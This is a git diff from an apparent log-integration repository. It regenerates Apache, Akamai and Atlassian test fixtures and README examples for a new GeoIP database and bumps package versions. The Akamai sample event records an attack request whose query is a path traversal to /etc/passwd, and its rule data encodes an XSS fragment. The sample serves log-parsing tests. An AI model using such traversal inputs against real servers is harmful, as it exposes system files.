@@ -115,7 +115,7 @@ "id": "2ab418ac8515f33", "ingested": "2021-12-08T14:30:40Z", "kind": "event", - "original": "{\"attackData\":{\"clientIP\":\"52.91.36.10\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"format\":\"json\",\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\":\"TLSv1.2\"},\"type\":\"akamai_siem\",\"userRiskData\":{\"allow\":\"0\",\"general\":\"duc_1h:10|duc_1d:30\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"score\":\"75\",\"status\":\"0\",\"trust\":\"ugp:US\",\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\"},\"version\":\"1.0\"}", + "original": "{\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; 
UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"format\":\"json\",\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\":\"TLSv1.2\"},\"type\":\"akamai_siem\",\"userRiskData\":{\"allow\":\"0\",\"general\":\"duc_1h:10|duc_1d:30\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"score\":\"75\",\"status\":\"0\",\"trust\":\"ugp:US\",\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\"},\"version\":\"1.0\"}", "start": "2016-08-11T13:45:33.026Z" }, "host": { 
@@ -145,30 +145,30 @@ }, "related": { "ip": [ - "52.91.36.10" + "89.160.20.156" ] }, "source": { - "address": "52.91.36.10", + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", + "location": { + "lon": 15.6167, + "lat": 58.4167 + } + }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "geo": { - "city_name": "Ashburn", - "continent_name": "North America", - "country_iso_code": "US", - "country_name": "United States", - "location": { - "lat": 39.0481, - "lon": -77.4728 - }, - "region_iso_code": "US-VA", - "region_name": "Virginia" - }, - "ip": "52.91.36.10" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tags": [ "akamai-siem", diff --git a/packages/akamai/docs/README.md b/packages/akamai/docs/README.md index 96b76a5d16d..edb632435cd 100644 --- a/packages/akamai/docs/README.md +++ b/packages/akamai/docs/README.md @@ -207,26 +207,26 @@ An example event for `siem` looks as following: } }, "client": { - "address": "52.91.36.10", + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", + "location": { + "lon": 15.6167, + "lat": 58.4167 + } + }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "geo": { - "city_name": "Ashburn", - "continent_name": "North America", - "country_iso_code": "US", - "country_name": "United States", - "location": { - "lat": 39.0481, - "lon": -77.4728 - }, - "region_iso_code": "US-VA", - "region_name": "Virginia" - }, - "ip": "52.91.36.10" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "data_stream": { "dataset": "akamai.siem", 
@@ -249,7 +249,7 @@ An example event for `siem` looks as following: "id": "2ab418ac8515f33", "ingested": "2021-12-08T14:30:40Z", "kind": "event", - "original": "{\"attackData\":{\"clientIP\":\"52.91.36.10\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"format\":\"json\",\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\":\"TLSv1.2\"},\"type\":\"akamai_siem\",\"userRiskData\":{\"allow\":\"0\",\"general\":\"duc_1h:10|duc_1d:30\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"score\":\"75\",\"status\":\"0\",\"trust\":\"ugp:US\",\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\"},\"version\":\"1.0\"}", + "original": 
"{\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"format\":\"json\",\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\":\"TLSv1.2\"},\"type\":\"akamai_siem\",\"userRiskData\":{\"allow\":\"0\",\"general\":\"duc_1h:10|duc_1d:30\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"score\":\"75\",\"status\":\"0\",\"trust\":\"ugp:US\",\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\"},\"version\":\"1.0\"}", "start": "2016-08-11T13:45:33.026Z" }, "host": { 
@@ -279,30 +279,30 @@ An example event for `siem` looks as following: }, "related": { "ip": [ - "52.91.36.10" + "89.160.20.156" ] }, "source": { - "address": "52.91.36.10", + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", + "location": { + "lon": 15.6167, + "lat": 58.4167 + } + }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "geo": { - "city_name": "Ashburn", - "continent_name": "North America", - "country_iso_code": "US", - "country_name": "United States", - "location": { - "lat": 39.0481, - "lon": -77.4728 - }, - "region_iso_code": "US-VA", - "region_name": "Virginia" - }, - "ip": "52.91.36.10" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tags": [ "akamai-siem", diff --git a/packages/apache/changelog.yml b/packages/apache/changelog.yml index 565a75f4861..d8fdafddc9b 100644 --- a/packages/apache/changelog.yml +++ b/packages/apache/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.4" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.3" changes: - description: Change test public IPs to the supported subset diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json index 481ed5c4e5d..3335a0c69df 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json 
@@ -25,7 +25,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:30:29.903774500Z", + "ingested": "2021-12-14T14:34:05.105740618Z", "original": "::1 - - [26/Dec/2016:16:16:29 +0200] \"GET /favicon.ico HTTP/1.1\" 404 209", "category": "web", "kind": "event", @@ -45,17 +45,6 @@ ] }, { - "source": { - "address": "192.168.33.1", - "ip": "192.168.33.1" - }, - "url": { - "path": "/hello", - "original": "/hello" - }, - "tags": [ - "preserve_original_event" - ], "apache": { "access": {} }, @@ -76,8 +65,12 @@ "status_code": 404 } }, + "source": { + "address": "192.168.33.1", + "ip": "192.168.33.1" + }, "event": { - "ingested": "2021-12-09T13:30:29.903783200Z", + "ingested": "2021-12-14T14:34:05.105743350Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:13 +0000] \"GET /hello HTTP/1.1\" 404 499 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -87,6 +80,10 @@ "user": { "name": "-" }, + "url": { + "path": "/hello", + "original": "/hello" + }, "user_agent": { "name": "Firefox", "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", @@ -99,7 +96,10 @@ "name": "Mac" }, "version": "50.0." - } + }, + "tags": [ + "preserve_original_event" + ] }, { "apache": { @@ -119,7 +119,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:30:29.903788600Z", + "ingested": "2021-12-14T14:34:05.105743828Z", "original": "::1 - - [26/Dec/2016:16:16:48 +0200] \"-\" 408 -", "category": "web", "kind": "event", @@ -134,17 +134,6 @@ ] }, { - "source": { - "address": "172.17.0.1", - "ip": "172.17.0.1" - }, - "url": { - "path": "/stringpatch", - "original": "/stringpatch" - }, - "tags": [ - "preserve_original_event" - ], "apache": { "access": {} }, 
@@ -165,8 +154,12 @@ "status_code": 404 } }, + "source": { + "address": "172.17.0.1", + "ip": "172.17.0.1" + }, "event": { - "ingested": "2021-12-09T13:30:29.903792500Z", + "ingested": "2021-12-14T14:34:05.105744250Z", "original": "172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "category": "web", "kind": "event", @@ -176,6 +169,10 @@ "user": { "name": "-" }, + "url": { + "path": "/stringpatch", + "original": "/stringpatch" + }, "user_agent": { "name": "Firefox Alpha", "original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", @@ -188,20 +185,12 @@ "name": "Other" }, "version": "15.0.a2" - } - }, - { - "source": { - "address": "monitoring-server", - "domain": "monitoring-server" - }, - "url": { - "path": "/status", - "original": "/status" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "apache": { "access": {} }, @@ -222,8 +211,12 @@ "status_code": 200 } }, + "source": { + "address": "monitoring-server", + "domain": "monitoring-server" + }, "event": { - "ingested": "2021-12-09T13:30:29.903797600Z", + "ingested": "2021-12-14T14:34:05.105744722Z", "original": "monitoring-server - - [29/May/2017:19:02:48 +0000] \"GET /status HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "category": "web", "kind": "event", @@ -233,6 +226,10 @@ "user": { "name": "-" }, + "url": { + "path": "/status", + "original": "/status" + }, "user_agent": { "name": "Firefox Alpha", "original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", @@ -245,7 +242,10 @@ "name": "Other" }, "version": "15.0.a2" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "apache": { 
@@ -271,7 +271,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:30:29.903803900Z", + "ingested": "2021-12-14T14:34:05.105745119Z", "original": "127.0.0.1 - - [02/Feb/2019:05:38:45 +0100] \"-\" 408 152 \"-\" \"-\"", "category": "web", "kind": "event", @@ -293,18 +293,6 @@ ] }, { - "source": { - "address": "monitoring-server", - "domain": "monitoring-server" - }, - "url": { - "path": "/A Beka G1 Howe/029_AND_30/15 reading elephants.mp4", - "extension": "mp4", - "original": "/A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4" - }, - "tags": [ - "preserve_original_event" - ], "apache": { "access": {} }, @@ -325,8 +313,12 @@ "status_code": 200 } }, + "source": { + "address": "monitoring-server", + "domain": "monitoring-server" + }, "event": { - "ingested": "2021-12-09T13:30:29.903809300Z", + "ingested": "2021-12-14T14:34:05.105745518Z", "original": "monitoring-server - - [29/May/2017:19:02:48 +0000] \"GET /A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "category": "web", "kind": "event", @@ -336,6 +328,11 @@ "user": { "name": "-" }, + "url": { + "path": "/A Beka G1 Howe/029_AND_30/15 reading elephants.mp4", + "extension": "mp4", + "original": "/A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4" + }, "user_agent": { "name": "Firefox Alpha", "original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", @@ -348,7 +345,10 @@ "name": "Other" }, "version": "15.0.a2" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json index c893102f466..b056c3dbb95 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json 
+++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json @@ -25,7 +25,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:30:30.879403900Z", + "ingested": "2021-12-14T14:34:06.093531222Z", "original": "::1 - - [26/Dec/2016:16:16:28 +0200] \"GET / HTTP/1.1\" 200 45", "category": "web", "kind": "event", @@ -68,7 +68,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:30:30.879409400Z", + "ingested": "2021-12-14T14:34:06.093534426Z", "original": "::1 - - [26/Dec/2016:16:16:29 +0200] \"GET /favicon.ico HTTP/1.1\" 404 209", "category": "web", "kind": "event", @@ -105,7 +105,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:30:30.879413800Z", + "ingested": "2021-12-14T14:34:06.093534891Z", "original": "::1 - - [26/Dec/2016:16:16:48 +0200] \"-\" 408 -", "category": "web", "kind": "event", @@ -142,14 +142,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -162,7 +162,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:30.879418Z", + "ingested": "2021-12-14T14:34:06.093535376Z", "original": "89.160.20.156 - - [26/Dec/2016:18:23:35 +0200] \"GET / HTTP/1.1\" 200 45", "category": "web", "kind": "event", @@ -203,14 +203,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -223,7 +223,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:30.879422100Z", + "ingested": "2021-12-14T14:34:06.093535764Z", "original": "89.160.20.156 - - [26/Dec/2016:18:23:41 +0200] \"GET /notfound HTTP/1.1\" 404 206", "category": "web", "kind": "event", @@ -264,14 +264,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -284,7 +284,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:30.879427100Z", + "ingested": "2021-12-14T14:34:06.093536142Z", "original": "89.160.20.156 - - [26/Dec/2016:18:23:45 +0200] \"GET /hmm HTTP/1.1\" 404 201", "category": "web", "kind": "event", diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json index 0964c3ba0d3..8d05c25b3a5 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json @@ -34,7 +34,7 @@ "ip": "172.30.0.119" }, "event": { - "ingested": "2021-12-09T13:30:31.533065900Z", + "ingested": "2021-12-14T14:34:06.744087534Z", "original": "[10/Aug/2018:09:45:56 +0200] 172.30.0.119 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /nagiosxi/ajaxhelper.php?cmd=getxicoreajax\u0026amp;opts=%7B%22func%22%3A%22get_admin_tasks_html%22%2C%22args%22%3A%22%22%7D\u0026amp;nsp=b5c7d5d4b6f7d0cf0c92f9cbdf737f6a5c838218425e6ae21 HTTP/1.1\" 1375", "category": "web", "kind": "event", 
@@ -77,14 +77,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -97,7 +97,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:31.533074100Z", + "ingested": "2021-12-14T14:34:06.744090082Z", "original": "[16/Oct/2019:11:53:47 +0200] 89.160.20.156 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /appl/ajaxhelper.php?cmd=getxicoreajax\u0026opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D\u0026nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1\" -", "category": "web", "kind": "event", diff --git a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json index 21df2d32d2f..abd455abe8a 100644 --- a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json +++ b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json @@ -19,7 +19,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-12-09T13:30:33.868254100Z", + "ingested": "2021-12-14T14:34:09.255770595Z", "original": "[Mon Dec 26 16:22:08 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico", "category": "web", "type": "error", @@ -48,7 +48,7 @@ "level": "notice" }, "event": { - "ingested": "2021-12-09T13:30:33.868263600Z", + "ingested": "2021-12-14T14:34:09.255773246Z", "original": "[Mon Dec 26 16:15:55.103786 2016] [core:notice] [pid 11379] AH00094: Command line: '/usr/local/Cellar/httpd24/2.4.23_2/bin/httpd'", "category": "web", "type": "info", 
@@ -67,20 +67,32 @@ "id": 4328636416 } }, + "apache": { + "error": { + "module": "core" + } + }, + "file": { + "path": "/usr/local/apache2/htdocs/favicon.ico" + }, + "@timestamp": "2011-09-09T10:42:29.902+02:00", + "ecs": { + "version": "1.12.0" + }, "log": { "level": "error" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -92,30 +104,18 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, - "message": "File does not exist: /usr/local/apache2/htdocs/favicon.ico", - "tags": [ - "preserve_original_event" - ], - "apache": { - "error": { - "module": "core" - } - }, - "file": { - "path": "/usr/local/apache2/htdocs/favicon.ico" - }, - "@timestamp": "2011-09-09T10:42:29.902+02:00", - "ecs": { - "version": "1.12.0" - }, "event": { - "ingested": "2021-12-09T13:30:33.868270Z", + "ingested": "2021-12-14T14:34:09.255773777Z", "original": "[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 89.160.20.156] File does not exist: /usr/local/apache2/htdocs/favicon.ico", "category": "web", "type": "error", "timezone": "GMT+2", "kind": "event" - } + }, + "message": "File does not exist: /usr/local/apache2/htdocs/favicon.ico", + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -136,14 +136,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -157,7 +157,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:33.868275800Z", + "ingested": "2021-12-14T14:34:09.255774189Z", "original": "[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 89.160.20.156:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html", "category": "web", "type": "error", diff --git a/packages/apache/manifest.yml b/packages/apache/manifest.yml index b63f137bed4..9cca4419584 100644 --- a/packages/apache/manifest.yml +++ b/packages/apache/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: apache title: Apache HTTP Server -version: 1.3.3 +version: 1.3.4 license: basic description: Collect logs and metrics from Apache servers with Elastic Agent. type: integration diff --git a/packages/atlassian_bitbucket/changelog.yml b/packages/atlassian_bitbucket/changelog.yml index a007d6f710c..b66475461bc 100644 --- a/packages/atlassian_bitbucket/changelog.yml +++ b/packages/atlassian_bitbucket/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.0.0" changes: - description: Initial draft of the package diff --git a/packages/atlassian_bitbucket/manifest.yml b/packages/atlassian_bitbucket/manifest.yml index 83bdb90f263..9a3243e91c2 100644 --- a/packages/atlassian_bitbucket/manifest.yml +++ b/packages/atlassian_bitbucket/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: atlassian_bitbucket title: Atlassian Bitbucket -version: 1.0.0 +version: 1.0.1 license: basic description: Collect logs from Atlassian Bitbucket with Elastic Agent. type: integration diff --git a/packages/atlassian_confluence/changelog.yml b/packages/atlassian_confluence/changelog.yml index ae4b2f05323..eda010500b4 100644 --- a/packages/atlassian_confluence/changelog.yml 
+++ b/packages/atlassian_confluence/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.0.0" changes: - description: Initial draft of the package diff --git a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json index 06d433ef68e..9d7c636c138 100644 --- a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json +++ b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json @@ -54,20 +54,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
